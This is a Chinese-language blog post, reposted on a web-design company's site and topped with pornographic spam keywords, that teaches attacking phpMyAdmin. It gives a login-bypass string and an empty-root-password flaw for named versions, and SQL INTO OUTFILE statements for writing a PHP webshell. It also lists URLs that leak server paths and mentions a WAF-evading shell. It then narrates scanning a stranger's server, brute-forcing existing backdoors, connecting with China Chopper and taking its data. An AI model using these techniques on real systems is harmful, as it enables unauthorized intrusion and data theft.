真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網站制作重慶分公司

PHPmyadmin漏洞以及拿shell的示例分析

小編給大家分享一下PHPmyadmin漏洞以及拿shell的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

成都創(chuàng)新互聯(lián)公司主要從事成都做網站、成都網站制作、網頁設計、企業(yè)做網站、公司建網站等業(yè)務。立足成都服務郫都,十多年網站建設經驗,價格優(yōu)惠、服務專業(yè),歡迎來電咨詢建站服務:18980820575

phpmyadmin的漏洞相對來說,還是比較多的,對于新手來說,分享幾個漏洞,深入的處于代碼審計方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個版本存在萬能密碼,直接使用‘localhost’@'@”為賬號,密碼不用輸入。

phpmyadmin2.11.9.2 這個版本存在空口令。直接root用戶登陸,密碼不用

找這個的話 用自己的寫的腳本,或者搜素引擎什么的,這里懂的人就懂了,不懂也不在這里。

關于拿shell,----》root權限,并且有寫文件權限 ----》導出的目錄有寫權限 ----》有的情況下,就算你這兩個都有,但是服務器的一些配置還是會對這個有影響。

在getshell之前先進入一個數(shù)據庫

第一種,使用sql語句,創(chuàng)建一個表,添加一個字段,字段的內容為一句話,然后導出到php文件中,最后刪除這個表,這個是最保險的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('')
select 列 from 表 into _utfile '路徑'
Drop TABLE IF EXISTS 表;
第二種方法,這個是直接寫入
select '一句話'INTO _UTFILE '路徑'
還有幾種方法,大致原理都一樣。
然后,一般的話,一句話都是

有狗的話,用免殺一句話,下面這個是我過年前構造的過狗一句話,現(xiàn)在應該還可以過

找路徑的話,

1// 利用phpinfo.php
 2//利用phpmyadmin的一些文件報錯,下面都是網上通用的
 /phpMyAdmin/index.php?lang[]=1
 /phpMyAdmin/phpinfo.php
 /load_file()
 /phpmyadmin/themes/darkblue_orange/layout.inc.php
 /phpmyadmin/libraries/select_lang.lib.php
 /phpmyadmin/libraries/lect_lang.lib.php
 /phpmyadmin/libraries/mcrypt.lib.php
 /phpmyadmin/libraries/export/xls.php

3//再者就是利用網站包路徑,這些會的都會了,不會的慢慢的就會了。

下面開始實戰(zhàn),腳本掃到一個IP,顯示存在phpmyadmin,打開

PHPmyadmin漏洞以及拿shell的示例分析

一看這些php文件就是后門一句話,放到幾萬字典爆破,兩秒鐘

PHPmyadmin漏洞以及拿shell的示例分析

直接菜刀鏈接。。。。。
這個肯定被人搞了,直接打包好東西,你懂的。。。提權什么的就不必要了。

PHPmyadmin漏洞以及拿shell的示例分析

以上是“PHPmyadmin漏洞以及拿shell的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道!


本文題目:PHPmyadmin漏洞以及拿shell的示例分析
轉載來于:http://weahome.cn/article/gjehsd.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部